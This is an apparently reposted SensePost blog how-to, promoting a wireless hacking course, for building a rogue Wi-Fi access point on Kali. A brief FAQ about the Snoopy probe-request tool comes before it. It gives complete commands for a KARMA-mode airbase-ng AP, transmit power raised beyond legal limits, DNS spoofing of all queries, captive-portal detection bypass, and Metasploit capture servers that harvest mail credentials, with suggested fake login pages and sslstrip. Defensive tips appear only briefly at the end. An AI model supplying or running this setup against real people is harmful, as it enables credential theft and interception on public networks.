GSM, NFC, etc Q. You're doing illegal things and you're going to jail! A. As mentioned earlier, the broadcast nature of probe-requests means no laws (in the UK) are being broken. Furthermore, I spoke to a BT Engineer at 44Con, and he told me that there's no copyright on SSID names - i.e. there's nothing illegal about pretending to be "BTOpenzone" or "SkyHome-AFA1". However, I suspect at the point where you start monitoring/modifying network traffic you may get in trouble. Interesting to note that in the USA a judge ruled that data interception on an open network is not illegal. Q. But I run iOS 5/6 and they say this is fixed!! A. Mark Wuergler of Immunity, Inc did find a flaw whereby iOS devices leaked info about the last 3 networks they had connected to. The BSSID was included in ARP requests, which meant anyone sniffing the traffic originating from that device would be privy to the addresses. Snoopy only looks at broadcast SSIDs at this stage - and so this fix is unrelated. We haven't done any tests with the latest iOS, but will update the blog when we have done so. Q. I want Snoopy! A. I'm working on it. Currently tidying up code, writing documentation, etc. Soon - See more at: SensePost Blog
  25. Rogue Access Points, a how-to Tags: blackhat, howto, public, wifi — dominic @ 13:11 In preparation for our wireless training course at BlackHat Vegas in a few weeks, I spent some time updating the content on rogue/spoofed access points. What we mean by this are access points under your control, that you attempt to trick a user into connecting to, rather than the "unauthorised access points" Bob in Marketing bought and plugged into your internal network for his team to use. I'll discuss how to quickly get a rogue AP up on Kali that will allow you to start gathering some creds, specifically mail creds. Once you have that basic pattern down, setting up more complex attacks is fairly easy. This is a fairly detailed "how-to" style blog entry that gives you a taste of what you can grab on our training course. Preparation First up, you'll need a wireless card that supports injection. The aircrack forums maintain a list. I'm using the Alfa AWUS036H. Students on our course each get one of these to keep. We buy them from Rokland who always give us great service. Second, you'll need a laptop running Kali. The instructions here are pretty much the same for BackTrack (deprecated, use Kali). For this setup, you won't need upstream internet connectivity. In many ways setting up a "mitm" style rogue AP is much easier, but it requires that you have upstream connectivity which means you have to figure out an upstream connection (if you want to be mobile this means buying data from a mobile provider) and prevents you from using your rogue in funny places like aeroplanes or data centres. We're going to keep things simple. Finally, you'll need to install some packages, I'll discuss those as we set each thing up. Overview We're going to string a couple of things together here: Access Point <-> routing & firewalling <-> DHCP <-> spoof services (DNS & mail) There are several ways you can do each of these depending on preference and equipment. I'll cover some alternatives, but here I'm going for quick and simple. Access Point Ideally, you should have a fancy wifi card with a Prism chipset that you can put into master mode, and have (digininja's karma patched) hostapd play nicely with. But, we don't have one of those, and will be using airbase-ng's soft ap capability. You won't get an AP that scales particularly well, or has decent throughput, or even guarantees that people can associate, but it's often good enough. For this section, we'll use a few tools: airbase-ng (via the aircrack-ng suite) macchanger iw You can install these with: apt-get install aircrack-ng macchanger iw First, let's practise some good opsec and randomise our MAC address, then, while we're at it, push up our transmit power. Assuming our wifi card has shown up as the device wlan0 (you can check with airmon-ng), we'll run: ifconfig wlan0 down macchanger -r wlan0 #randomise our MAC iw reg set BO #change our regulatory domain to something more permissive ifconfig wlan0 up iwconfig wlan0 txpower 30 #1Watt transmit power Right, now we can set up the AP using airbase. We have some options, with the biggest being whether you go for a KARMA style attack, or a point-network spoof. airmon-ng start wlan0 #Put our card into monitor mode airbase-ng -c6 -P -C20 -y -v mon0& #Set up our soft AP in karma mode #airbase-ng -c6 -e "Internet" -v mon0& #Alternatively, set up our soft AP for 1 net (no karma) Airbase has a couple of different ways to work. I'll explain the parameters: -c channel, check which channel is the least occupied with airodump -P (karma mode) respond to all probes i.e. if a victim's device is usually connects to the open network "Internet" it will probe to see if that network is nearby. Our AP will see the probe and helpfully respond. The device, not knowing that this isn't an ESS for the Internet network, will join our AP. -y don't respond to broadcast probes, aka the "is there anyone out there" shout of wifi. This helps in busy areas to reduce the AP's workload -C20 after a probed for network has been seen, send beacons with that network name out for 20 seconds afterwards. If you're having trouble connecting, increasing this can help, but not much -v be verbose -e "Internet" pretend to be a specific fake ESSID. Using airodump and monitoring for probed networks from your victim, and just pretending to be that network (i.e. drop -P and -y) can increase reliability for specific targets. If you're putting this into a script, make sure to background the airbase process (the &). At this point, you should have an AP up and running. Routing & IP Time There are lots of options here, you could bridge the AP and your upstream interface, you could NAT (NB you can't NAT from wifi to wifi). We're not using an upstream connection, so things are somewhat simpler, we're just going to give our AP an IP and add a route for it's network. It's all standard unix tools here. The basics: ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 echo '1' > /proc/sys/net/ipv4/ip_forward This is good enough for our no upstream AP, but if you wanted to use an upstream bridge, you could use the following alternates: apt-get install bridge-utils #To get the brctl tool, only run this once brctl addbr br0 brctl addif br0 eth0 #Assuming eth0 is your upstream interface brctl addif br0 at0 ifconfig br0 up If you wanted to NAT, you could use: iptables --policy INPUT ACCEPT #Good housekeeping, clean the tables first iptables --policy OUTPUT ACCEPT #Don't want to clear rules with a default DENY iptables --policy FORWARD ACCEPT iptables -t nat -F iptables -F #The actual NAT stuff iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE iptables -A FORWARD -i at0 -o eth0 -j ACCEPT Legitimate Services We need to have a fully functioning network, which requires some legitimate services. For our purposes, we only really need one, DHCP. Metasploit does have a dhcpd service, but it seems to have a few bugs. I'd recommend using the standard isc-dhcp-server in Kali which is rock solid. apt-get install isc-dhcp-server #Only run this once cat >> dhcpd.conf #We need to write the dhcp config file authoritative; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }^D #If you chose this method of writing the file, hit Ctrl-D dhcpd -cf dhcpd.conf Evil Services We're going to cover three evil services here: DNS spoofing Captive portal detection avoidance Mail credential interception services DNS spoofing Once again, there are a couple of ways you can do DNS spoofing. The easiest is to use Dug Song's dnsspoof. An alternative would be to use metasploit's fakedns, but I find that makes the metasploit output rather noisy. Since there's no upstream, we'll just spoof all DNS queries to point back to us. apt-get install dsniff #Only run the first time cat >> dns.txt 10.0.0.1 * ^D #As in hit Ctrl-C dnsspoof -i at0 -f dns.txt& #Remember to background it if in a script Captive Portal Detection Avoidance Some OS's will try to detect whether they have internet access on first connecting to a network. Ostensibly, this is to figure out if there's a captive portal requiring login. The devices which do this are Apple, BlackBerry and Windows. Metasploit's http capture server has some buggy code to try and deal with this, that you could use, however, I find the cleanest way is to just use apache and create some simple vhosts. You can download the apache config from here. apt-get install apache2 wget http://www.sensepost.com/blogstatic/2013/07/apache-spoof_captive_portal.tar.gz cd / tar zcvf ~/apache-spoof_captive_portal.tar.gz service apache start This will create three vhosts (apple, blackberry & windows) that will help devices from those manufacturers believe they are on the internet. You can easily extend this setup to create fake capture pages for accounts.google.com, www.facebook.com, twitter.com etc. (students will get nice pre-prepared versions that write to msf's cred store). Because dnsspoof is pointing all queries back to our host, requests for Apple will hit our apache. Mail credential interception Next up, let's configure the mail interception. Here we're going to use metasploit's capture server. I'll show how this can be used for mail, but once you've got this up, it's pretty trivial to get the rest up too (ala karmetasploit). All we need to do, is create a resource script, then edit it with msfconsole: cat >> karma-mail.rc use auxiliary/server/capture/imap exploit -j use auxiliary/server/capture/pop3 exploit -j use auxiliary/server/capture/smtp exploit -j use auxiliary/server/capture/imap set SRVPORT 993 set SSL true exploit -j use auxiliary/server/capture/pop3 set SRVPORT 995 set SSL true exploit -j use auxiliary/server/capture/smtp set SRVPORT 465 set SSL true exploit -j ^D #In case you're just joining us, yes that's a Ctrl-D msfconsole -r mail-karma.rc #Fire it up This will create six services listening on six different ports. Three plain text services for IMAP, POP3, and SMTP, and three SSL enabled versions (although, this won't cover services using STARTTLS). Metasploit will generate random certificates for the SSL. If you want to be smart about it, you can use your own certificates (or CJR's auxiliar/gather/impersonate_ssl). Once again, because dnsspoof is pointing everything at us, we can just wait for connections to be initiated. Depending on the device being used, user's usually get some sort of cert warning (if your cert isn't trusted). Apple devices give you a fairly big obvious warning, but if you click it once, it will permanently accept the cert and keep sending you creds, even when the phone is locked (yay). Metasploit will proudly display them in your msfconsole session. For added certainty, set up a db so the creds command will work nicely. Protections When doing this stuff, it's interesting to see just how confusing the various warnings are from certain OS'es and how even security people get taken sometimes. To defend yourself, do the following: Don't join "open" wifi networks. These get added to your PNL and probed for when you move around, and sometimes hard to remove later. Remove open wifi networks from your remembered device networks. iOS in particular makes it really hard to figure out which open networks it's saved and are probing for. You can use something like airbase to figure that out (beacon out for 60s e.g.) and tell the phone to "forget this network". Use SSL and validate the *exact* certificate you expect. For e.g. my mail client will only follow through with it's SSL negotiation if the *exact* certificate it's expecting is presented. If I join a network like this, it will balk at the fake certificate without prompting. It's easy, when you're in a rush and not thinking, to click other devices "Continue" button. Conclusion By this point, you should have a working rogue AP setup, that will aggressively pursue probed for networks (ala KARMA) and intercept mail connections to steal the creds. You can run this thing anywhere there are mobile devices (like the company canteen) and it's a fairly cheap way to grab credentials of a target organisation. This setup is also remarkably easy to extend to other uses. We briefly looked at using bridging or NAT'ting to create a mitm rogue AP, and I mentioned the other metasploit capture services as obvious extensions. You can also throw in tools like sslstrip/sslsniff. If you'd like to learn more about this and other wifi hacking techniques, then check out our Hacking by Numbers - Unplugged edition course at Black Hat. We've got loads of space. If you'd like to read more, taddong's RootedCon talk from this year is a good place to start. - See more at: SensePost Blog Sursa: SensePost Blog
×
×
  • Create New...